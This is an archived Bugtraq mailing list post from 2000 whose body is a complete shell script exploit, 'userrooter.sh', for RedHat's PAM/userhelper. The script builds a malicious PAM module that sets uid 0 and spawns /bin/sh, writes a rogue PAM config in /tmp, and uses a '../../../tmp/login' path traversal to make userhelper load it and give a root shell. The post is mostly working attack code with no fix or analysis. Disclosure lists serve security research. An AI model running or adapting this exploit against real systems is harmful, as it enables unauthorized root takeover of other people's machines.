Bugtraq mailing list archives

userhelper/PAM exploit

From: super () CE NET (Derek Callaway)
Date: Wed, 5 Jan 2000 00:21:26 -0500


#!/bin/sh
# userrooter.sh by S <super () innu org>
# RedHat PAM/userhelper(8) exploit
# Hi to inNUENdo!
LAME=`rpm -qf /usr/sbin/userhelper | awk -F'-' '{print $2}' | awk -F'.' '{print $2}'`
if [ $LAME -gt 15 ]
        then echo "Machine doesn't appear to be vulnerable :-\\"
        echo "Trying anyway..."
fi
cat << EOF >/tmp/hello-root.c
#include<unistd.h>
#include<stdlib.h>

void pam_sm_authenticate(void){
        setuid(0);
        puts("userrooter by S");
        system("/bin/sh");
        exit(EXIT_SUCCESS);
}

void pam_sm_setcred(void){
        setuid(0);
        puts("userrooter by S");
        system("/bin/sh");
        exit(EXIT_SUCCESS);
}
EOF

cat << EOF >/tmp/login
#%PAM-1.0
auth     required       /tmp/pamper.so
EOF

gcc -shared -fPIC -O2 -o /tmp/pamper.so /tmp/hello-root.c
rm /tmp/hello-root.c
chmod 0700 /tmp/login
/usr/sbin/userhelper -w ../../../tmp/login
rm /tmp/pamper.so
rm /tmp/login

--
/* Derek Callaway <super () ce net> char *sites[]={"http://www.geekwise.com";,
   Programmer; CE Net, Inc.  "http://www.freezersearch.com/index.cfm?aff=dhc";,
   (302) 854-5440 Ext. 206   "http://www.homeworkhelp.org",0}; */

Current thread:

Flaw in 3c59x.c or in Kernel? Sonny Parlin (Jan 04)
- Re: Flaw in 3c59x.c or in Kernel? Raymond Dijkxhoorn (Jan 04)
- Re: Flaw in 3c59x.c or in Kernel? Bill Paul (Jan 04)
  - Re: Flaw in 3c59x.c or in Kernel? danny (Jan 04)
  - userhelper/PAM exploit Derek Callaway (Jan 04)
  - Re: Flaw in 3c59x.c or in Kernel? Raymond Dijkxhoorn (Jan 05)
- Re: Flaw in 3c59x.c or in Kernel? David Malone (Jan 05)
  - Re: Flaw in 3c59x.c or in Kernel? Sonny Parlin (Jan 05)
    - Re: Flaw in 3c59x.c or in Kernel? Jonathan Poole (Jan 05)
  - Re: Flaw in 3c59x.c or in Kernel? Pug Bainter (Jan 05)
- <Possible follow-ups>
- FW: Flaw in 3c59x.c or in Kernel? William R. Lorenz (Jan 05)